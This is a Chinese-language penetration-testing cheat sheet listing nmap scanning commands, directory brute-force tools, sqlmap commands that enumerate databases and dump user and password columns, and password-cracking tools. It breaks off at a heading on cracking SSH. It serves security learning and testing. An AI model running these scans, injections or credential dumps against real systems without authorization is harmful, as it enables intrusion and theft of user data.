一、漏洞挖掘相关工具的使用
NMAP扫描工具使用
1.扫描指定的IP范围
nmap 192.168.0.101-110
2.扫描指定的IP网段
nmap 192.168.0.* --exclude 192.168.0.100
3.扫描指定网址的操作系统类型(深度扫描)
nmap -A 192.168.0.101
or
nmap -O 192.168.0.101
4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测)
nmap -sP 192.168.0.*
5.快速扫描主机开放的端口(nmap-services文件中的端口)
nmap -F 192.168.0.101
6.扫描特定的端口
nmap -p 80 192.168.0.101
nmap -p 80-160 192.168.0.101
7.完整的深度扫描
nmap -sP 192.168.0.101/24
nmap -p 1-65535 -A 192.168.0.101
nmap -sS -Pn -T4 -p 1-65535 192.168.0.101
nmap -A -O -p 80 192.168.0.101
目录爆破工具的使用
1.Windows平台-使用御剑,下载地址
https://github.com/foryujian/yjdirscan
2.Linux平台-使用kali中的Dirb,命令:
dirb http://192.168.1.101 /usr/share/wordlists/dirb/big.txt
kali自带图形化工具owasp-zap,命令:
root@kali:~# owasp-zap
Sqlmap工具的使用
1.查找数据库
sqlmap -u "http://www.xxx.com/link.php?id=321" --dbs
2.查找表
sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname --tables
3.查找列
sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns
4.查找字段值
sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C "id,user,password" --dump
5.通过POST方式注入
sqlmap -u "http://www.xxx.com/login.asp" --data "Username=admin&Password=123456"
6.Sqlmap组合命令的使用
sqlmap -u “http://www.xxx.com” --data "Username=amdin&Password=123" --level 3 --dbms mysql
#暴力扫描
sqlmap -u “http://www.xxx.com” --level 5 --risk 3 --forms --dbs
密码爆破工具的使用
Windows平台使用Archpr
Kali Linux使用hydra
#Kali中自带字典位置
cd /usr/share/wordlist
#破解SSH